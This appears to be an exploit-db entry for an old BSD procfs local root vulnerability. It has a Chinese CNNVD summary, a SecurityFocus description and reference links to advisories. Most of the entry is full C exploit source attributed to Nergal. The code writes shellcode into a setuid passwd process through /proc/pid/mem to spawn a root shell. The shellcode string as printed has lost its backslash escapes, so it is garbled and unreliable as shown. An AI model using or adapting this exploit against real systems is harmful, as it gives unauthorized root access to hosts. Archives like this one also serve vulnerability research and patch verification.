https://www.exploit-db.com/exploits/19726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-051

BSD系统中的procfs存在漏洞。本地用户借助修改的标准错误的文件描述符，通过修改/proc/pid/mem接口提升根特权。

source: http://www.securityfocus.com/bid/940/info

Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host.

The proc file system was originally designed to allow easy access to information about processes (hence the name). Its typical benefit is quicker access to memory hence more streamlined operations. As noted previously
certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under system which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry.

/* by Nergal */
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <sys/wait.h>

char            shellcode[] =
"xebx0ax62x79x20x4ex65x72x67x61x6cx20" 
"xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
"x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
"x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
"x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04x00";

#define PASSWD "./passwd"
void 
sg(int x)
{
}
int
main(int argc, char **argv)
{
	unsigned int stack, shaddr;
	int             pid,schild;
	int             fd;
	char            buff[40];
	unsigned int    status;
	char            *ptr;
	char            name[4096];
	char 		sc[4096];
	char            signature[] = "signature";

	signal(SIGUSR1, sg);
if (symlink("usr/bin/passwd",PASSWD) && errno!=EEXIST)
{
perror("creating symlink:");
exit(1);
}
	shaddr=(unsigned int)&shaddr;
	stack=shaddr-2048;
	if (argc>1)
	shaddr+=atoi(argv[1]);
	if (argc>2)
	stack+=atoi(argv[2]);
	fprintf(stderr,"shellcode addr=0x%x stack=0x%xn",shaddr,stack);
	fprintf(stderr,"Wait for "Press return" prompt:n");
	memset(sc, 0x90, sizeof(sc));
	strncpy(sc+sizeof(sc)-strlen(shellcode)-1, shellcode,strlen(shellcode));
	strncpy(sc,"EGG=",4);
memset(name,'x',sizeof(name));
	for (ptr = name; ptr < name + sizeof(name); ptr += 4)
		*(unsigned int *) ptr = shaddr;
	name[sizeof(name) - 1] = 0;

	pid = fork();
	switch (pid) {
	case -1:
		perror("fork");
		exit(1);
	case 0:
		pid = getppid();
		sprintf(buff, "/proc/%d/mem", pid);
		fd = open(buff, O_RDWR);
		if (fd < 0) {
			perror("open procmem");
			wait(NULL);
			exit(1);
		}
		/* wait for child to execute suid program */
		kill(pid, SIGUSR1);
		do {
			lseek(fd, (unsigned int) signature, SEEK_SET);
		} while
			(read(fd, buff, sizeof(signature)) == sizeof(signature) &&
			 !strncmp(buff, signature, sizeof(signature)));
		lseek(fd, stack, SEEK_SET);
		switch (schild = fork()) {
		case -1:
			perror("fork2");
			exit(1);
		case 0:

			dup2(fd, 2);
			sleep(2);
			execl(PASSWD, name, "blahblah", 0);
			printf("execl failedn");
			exit(1);
		default:
			waitpid(schild, &status, 0);
		}
		fprintf(stderr, "nPress return.n");
		exit(1);
	default:
		/* give parent time to open /proc/pid/mem */
		pause();
		putenv(sc);
		execl(PASSWD, "passwd", NULL);
		perror("execl");
		exit(0);

	}
}

来源:XF
名称:netbsd-procfs(3995)
链接:http://xforce.iss.net/xforce/xfdb/3995
来源:BID
名称:940
链接:http://www.securityfocus.com/bid/940
来源:OSVDB
名称:20760
链接:http://www.osvdb.org/20760
来源:NETBSD
名称:NetBSD-SA2000-001
链接:ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2000-001.txt.asc